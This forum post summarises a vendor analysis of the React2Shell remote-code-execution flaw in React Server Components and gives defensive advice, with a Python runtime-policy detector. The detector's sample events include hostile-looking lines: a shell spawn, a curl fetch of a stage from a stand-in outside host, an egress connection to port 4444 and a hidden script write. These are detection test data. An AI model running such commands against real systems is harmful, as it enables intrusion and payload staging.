React2Shell exploitation: are your server-side controls keeping up?


(@nhi-mgmt-group)
Member Moderator

TL;DR: CVE-2025-55182 in React Server Components enables unauthenticated remote code execution in React 19 and Next.js-backed applications, with active exploitation by state-linked groups, botnets, and opportunistic attackers, according to Aqua Security. Server-side framework trust assumptions collapse when deserialisation accepts attacker-controlled input without validation.

NHIMG editorial — based on content published by Aqua Security: Critical CVE in React Server Components Actively Exploited

By the numbers:

  • The flaw received a CVSS score of 10.0, reflecting its ease of exploitation, massive ecosystem footprint, and the threat of complete server takeover.

Questions worth separating out

Q: What breaks when a web framework can be exploited for remote code execution?

A: The main break is trust: the framework's assumption that the data it deserialises is benign no longer holds once attacker-controlled input reaches that path.

Q: Why do server-side rendering frameworks increase the impact of application vulnerabilities?

A: They increase impact because the same runtime often handles rendering, data access, and credential-bearing backend functions.

Q: How do security teams reduce the blast radius of internet-facing RCE flaws?

A: They reduce blast radius by removing long-lived credentials from the runtime, restricting service-account privilege, segmenting workload access, and monitoring for suspicious process and file activity.

Practitioner guidance

  • Block vulnerable React and Next.js versions in production. Inventory all applications using React 19 and RSC-dependent Next.js releases, then remove affected versions from deployable build paths until patched packages are verified in staging and production.
  • Rescan workloads for exposed secrets after any suspected exposure. Check environment variables, mounted config, CI/CD variables, and runtime files for credentials that may have been readable during compromise, then revoke and rotate anything that could have left the host boundary.
  • Tighten runtime controls around code injection behaviours. Use runtime policy to detect unexpected process spawning, shell execution, suspicious file writes, and outbound connections from web workloads so a successful exploit does not turn into a persistent foothold.
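As an added illustration of the third point (not code from Aqua Security or this post), the script below applies a per-workload runtime policy to a constructed stream of process, connection, and file-write events from a Node.js web workload; the event schema, the `web-frontend` workload name, and the allowlisted database address are assumptions.

```python
import json

# Constructed sample events; the field names are an assumed schema, not any real sensor's.
SAMPLE_EVENTS = """\
{"type":"exec","workload":"web-frontend","parent_comm":"node","comm":"node","cmdline":"node server.js"}
{"type":"exec","workload":"web-frontend","parent_comm":"node","comm":"sh","cmdline":"sh -c id"}
{"type":"exec","workload":"web-frontend","parent_comm":"node","comm":"curl","cmdline":"curl http://203.0.113.5/stage"}
{"type":"connect","workload":"web-frontend","comm":"node","dst":"10.0.3.12","port":5432}
{"type":"connect","workload":"web-frontend","comm":"node","dst":"203.0.113.5","port":4444}
{"type":"file_write","workload":"web-frontend","comm":"node","path":"/tmp/.cache/a.sh"}
{"type":"file_write","workload":"web-frontend","comm":"node","path":"/app/.next/cache/page.json"}
"""

# Assumed policy: a Next.js worker only forks node, only talks to its database,
# and only writes into its framework cache directory.
POLICY = {
    "web-frontend": {
        "allowed_children": {"node"},
        "allowed_egress": {("10.0.3.12", 5432)},
        "writable_prefixes": ("/app/.next/cache/",),
    }
}
SHELLS = {"sh", "bash", "dash", "zsh"}

def evaluate(event, policy):
    """Return (finding_kind, detail) if the event violates the workload's policy, else None."""
    rule = policy.get(event["workload"])
    if rule is None:
        return None  # no policy for this workload: nothing to enforce
    kind = event["type"]
    if kind == "exec" and event["parent_comm"] == "node":
        if event["comm"] not in rule["allowed_children"]:
            label = "shell_spawn" if event["comm"] in SHELLS else "unexpected_child"
            return (label, event["cmdline"])
    elif kind == "connect":
        if (event["dst"], event["port"]) not in rule["allowed_egress"]:
            return ("unexpected_egress", f'{event["dst"]}:{event["port"]}')
    elif kind == "file_write":
        if not event["path"].startswith(rule["writable_prefixes"]):
            return ("unexpected_write", event["path"])
    return None

def scan(lines, policy=POLICY):
    """Evaluate each JSON event line and collect policy violations in order."""
    findings = []
    for line in lines.splitlines():
        if line.strip():
            finding = evaluate(json.loads(line), policy)
            if finding:
                findings.append(finding)
    return findings

if __name__ == "__main__":
    for label, detail in scan(SAMPLE_EVENTS):
        print(f"ALERT {label}: {detail}")
```

The benign events (the node re-exec, the database connection, the cache write) pass, while the four policy violations surface as alerts a responder can act on.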

What's in the full analysis

Aqua Security's full research covers the operational detail this post intentionally leaves for the source:

  • Honeypot observations showing how real attackers behaved after exploiting React2Shell in the wild
  • Version-specific remediation guidance for React and Next.js releases affected by CVE-2025-55182
  • Runtime detection and policy examples for blocking code injection, shell spawning, and suspicious workload behaviour
  • Dependency review steps for identifying transitive packages that inherit the vulnerable RSC path

👉 Read Aqua Security's analysis of CVE-2025-55182 and React2Shell exploitation →

